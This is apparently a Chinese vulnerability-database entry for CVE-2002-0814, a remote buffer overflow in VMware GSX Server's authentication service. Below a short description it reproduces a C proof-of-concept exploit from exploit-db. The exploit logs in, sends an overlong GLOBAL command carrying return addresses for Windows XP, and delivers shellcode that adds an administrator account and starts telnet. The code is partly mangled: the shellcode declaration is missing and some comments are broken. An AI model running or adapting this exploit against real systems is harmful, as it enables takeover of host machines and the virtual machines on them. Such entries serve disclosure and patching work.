VMWare GSX Server验证服务远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106871 漏洞类型 缓冲区溢出
发布时间 2002-07-24 更新时间 2005-05-02
CVE编号 CVE-2002-0814 CNNVD-ID CNNVD-200208-066
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21639
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-066
|漏洞详情
VMwareGSXServer是一款非常流行的虚拟PC机软件,其中包含远程访问验证服务。VMwareGSXServer的验证服务在处理"Global"命令时对参数长度缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。VMwareGSXServer在与VMwareRemoteConsole通信是通过VMwareAuthorizationService监听的902端口与VMwareRemoteConsole进行连接的,在数据通讯之前的需要提交如下操作:220VMwareAuthenticationDaemonVersion1.00USERanyuser331Passwordrequiredforuser.PASS******230Useruserloggedin.GLOBALserver200ConnectGlobalUSER、PASS、GLOBAL命令对其参数都已经进行了充分检查,当提交参数的字符串过长时,会被断开连接,并返回类似599vmware-authdPANIC:BufferoverflowinVMAuthdSocketRead()的消息:220VMwareAuthenticationDaemonVersion1.00USERAAAA....(Ax500)599vmware-authdPANIC:BufferoverflowinVMAuthdSocketRead()但是GLOBAL命令在使用一个未超过限定长度的字符串做参数时就已经发生了溢出,溢出会导致VMwareAuthorizationService异常结束,精心构建提交参数可能使攻击者以管理员权限在系统中执行任意指令。以上漏洞需要有一个合法的帐户进行利用。
|漏洞EXP
source: http://www.securityfocus.com/bid/5294/info

VMWare GSX Server ships with an authentication server. The server is vulnerable to a buffer overflow related to handling of the argument to the "GLOBAL" command. While attackers must be authenticated before the command can be issued, default accounts may exist. This has not been confirmed by VMWare.

This condition may be exploited to execute arbitrary code on the GSX server host. The code likely executes on the underlying, native system and may compromise the host entirely (including all virtual systems).

////////////////////////////////////////////////////////////////////
//  VMwareOverflowTest v1.0
//  Written by Zag & Glcs
//  BigBall@venustech.com.cn glcs@venustech.com.cn
//  http://www.Venustech.com
////////////////////////////////////////////////////////////////////

#include "stdio.h"
#include "winsock2.h"
#include "stdlib.h"
#pragma comment (lib, "Ws2_32")

to make sure that the shellcode length and GLOBAL command length not 
exceed the limit.

//add an administrator account: x_adrc password: x_adrc
//start the telnet service
"\x68\xC1\x15\x35\x09\x81\x2C\x24"
"\x80\xD1\xF0\x08\x68\x63\x20\x20"
"\x2F\x68\x5F\x61\x64\x72\x68\x72"
"\x73\x20\x78\x68\x72\x61\x74\x6F"
"\x68\x6E\x69\x73\x74\x68\x61\x64"
"\x6D\x69\x68\x6F\x75\x70\x20\x68"
"\x61\x6C\x67\x72\x68\x20\x6C\x6F"
"\x63\x68\x26\x6E\x65\x74\x68\x74"
"\x73\x76\x72\x68\x20\x74\x6C\x6E"
"\x68\x74\x61\x72\x74\x68\x65\x74"
"\x20\x73\x68\x44\x44\x26\x6E\x68"
"\x63\x20\x2F\x41\x68\x5F\x61\x64"
"\x72\x68\x72\x63\x20\x78\x68\x78"
"\x5F\x61\x64\x68\x73\x65\x72\x20"
"\x68\x65\x74\x20\x75\x68\x2F\x63"
"\x20\x6E\x68\x63\x6D\x64\x20\x8B"
"\xC4\x6A\x01\x50\xB8\xC6\x84\xE6"
"\x77\xFF\xD0\x90";

//the JMP ESP address of WindowsXP English Version, we can add the address 
of other systems, such as Windows 2000.
unsigned char Jmp_ESP_XP_Eng[] = {0x1b,0x17,0xe3,0x77};//WinXP Eng
unsigned char Jmp_ESP[4];

void usage ()
{
	printf ("VMwareOverflowTest v1.0\n Written by Zag & Glcs\n 
Email:BigBall@venustech.com.cn\n Glcs@venustech.com.cn\n 
www.Venustech.com\n\nUsage:VMwareOverflowTest.exe <IP> <PORT> <username> 
<passwd> <os type>\n\t0.Windows XP Eng\n");
	return;
}

int main (int argc, char **argv)
{
	char str[4096];
	WSADATA wsa;
	SOCKET sock;
	struct sockaddr_in server;
	int ret;
	int i = 0;
	if (argc != 6)
	{
		usage ();
		return 0;
	}
	WSAStartup (MAKEWORD (2, 2), &wsa);
	sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
	server.sin_family = AF_INET;
	server.sin_port = htons (atoi (argv[2]));
	server.sin_addr.s_addr = inet_addr (argv[1]);

       //the base address of DLL files on each systems is not the same, so 
we need to modify the call address 
        //we can find that the system have loaded the DLL files we need by 
check VMware Authorization Service
       //then we only need modify the call address
	//(BASE_ADDRESS + FUNCTION_OFFSET)
	switch (atoi(argv[5]))
	{
	case 0:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);

		break;
	default:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);
		break;
	}
	ret = connect (sock, (struct sockaddr *)&server, sizeof (server));

	if (ret == SOCKET_ERROR)
	{
		printf ("connect error\n");
		return -1;
	}

	//receive welcome message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

        //send username confirm message
	memset (str, 0, sizeof (str));
	strcpy (str,"USER ");
	strcat (str, argv[3]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

        //receive confirm message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

	//send password
	memset (str, 0, sizeof (str));
	strcpy (str,"PASS ");
	strcat (str, argv[4]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

	//receive confirm message
	memset (str, 0, sizeof (str));
	ret = recv (sock, str, 100, 0);
	printf ("%s", str);

        make GLOBAL command
	memset (str, 0, sizeof (str));
	strcpy (str, "GLOBAL ");
	//to up the success probability, we use the half-continuous 
covering, so the exact overflow point is not need


	for(i = 7; i < 288; i += 8)
	{
		memcpy(str + i, "\x90\x90\x58\x68", 4);
		//write the JMP ESP command into the possible return 
address
		memcpy(str + i + 4, Jmp_ESP, 4);
	}

	//append the shellcode to the GLOBAL command string
	memcpy (str + i, shellcode, strlen (shellcode));
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);
	printf ("Done!\n");
	closesocket (sock);
	WSACleanup ();
	return 1;
}
|参考资料

来源:BUGTRAQ
名称:20020726Re:VMwareGSXServerRemoteBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102765223418716&w=2
来源:www.vmware.com
链接:http://www.vmware.com/download/gsx_security.html
来源:BUGTRAQ
名称:20020724VMwareGSXServerRemoteBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102752511030425&w=2
来源:BID
名称:5294
链接:http://www.securityfocus.com/bid/5294
来源:XF
名称:vmware-gsx-auth-bo(9663)
链接:http://www.iss.net/security_center/static/9663.php
来源:NTBUGTRAQ
名称:20020805VMwareGSXServer2.0.1ReleaseandSecurityAlert
链接:http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0057.html